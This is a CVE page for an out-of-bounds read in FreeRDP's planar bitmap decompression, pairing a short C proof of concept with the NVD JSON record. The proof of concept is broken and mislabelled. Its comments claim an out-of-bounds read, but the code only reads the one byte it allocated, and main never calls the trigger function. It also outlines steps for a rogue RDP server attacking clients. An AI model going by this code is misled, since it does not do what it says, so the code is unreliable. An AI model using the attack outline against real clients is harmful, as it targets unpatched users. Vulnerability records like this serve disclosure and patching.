CVE-2026-31897

// CVE-2026-31897 PoC - Malicious RDP Server Trigger // This PoC demonstrates triggering OOB read in freerdp_bitmap_decompress_planar // Compile: gcc -o poc poc.c -lfreerdp2 #include <freerdp/freerdp.h> #include <winpr/wtypes.h> // Trigger condition: SrcSize = 0 with non-NULL pSrcData // The vulnerable function will read one byte past pSrcData buffer void trigger_oob_read(rdpContext* context) { // Simulate the vulnerable code path BYTE* pSrcData = (BYTE*)malloc(1); // 1-byte buffer UINT32 SrcSize = 0; // Zero size triggers OOB read BYTE* srcp = pSrcData; // This line causes OOB read when SrcSize is 0: BYTE firstByte = *srcp; // Reads past buffer end printf("Triggered OOB read, got byte: 0x%02x\n", firstByte); free(pSrcData); } // For actual exploitation, setup malicious RDP server: // 1. Start rogue RDP server on attacker machine // 2. Send crafted bitmap decompression request with SrcSize=0 // 3. Victim FreeRDP client processes malformed packet // 4. OOB read occurs in freerdp_bitmap_decompress_planar int main() { printf("CVE-2026-31897 PoC\n"); printf("Target: FreeRDP < 3.24.0\n"); printf("Vulnerability: OOB read in freerdp_bitmap_decompress_planar\n"); return 0; }

{"cve": {"id": "CVE-2026-31897", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:38.023", "lastModified": "2026-03-17T12:57:00.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.24.0, there is an out-of-bounds read in freerdp_bitmap_decompress_planar when SrcSize is 0. The function dereferences *srcp (which points to pSrcData) without first verifying that SrcSize >= 1. When SrcSize is 0 and pSrcData is non-NULL, this reads one byte past the end of the source buffer. This vulnerability is fixed in 3.24.0."}, {"lang": "es", "value": "FreeRDP es una implementación gratuita del Protocolo de Escritorio Remoto. Antes de la versión 3.24.0, existe una lectura fuera de límites en freerdp_bitmap_decompress_planar cuando SrcSize es 0. La función desreferencia *srcp (que apunta a pSrcData) sin verificar primero que SrcSize &gt;= 1. Cuando SrcSize es 0 y pSrcData no es NULL, esto lee un byte más allá del final del búfer de origen. Esta vulnerabilidad se corrige en la versión 3.24.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N", "baseScore": 0.0, "baseSeverity": "NONE", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 0.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.24.0", "matchCriteriaId": "97FCA262-35C3-4B6B-A321-15CE780FCA20"}]}]}], "references": [{"url": "https://github.com/FreeRDP/FreeRDP/commit/cd27c8faca0eeb0d4309cc5837dfdf3c42eba4e7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-xgv6-r22m-7c9x", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}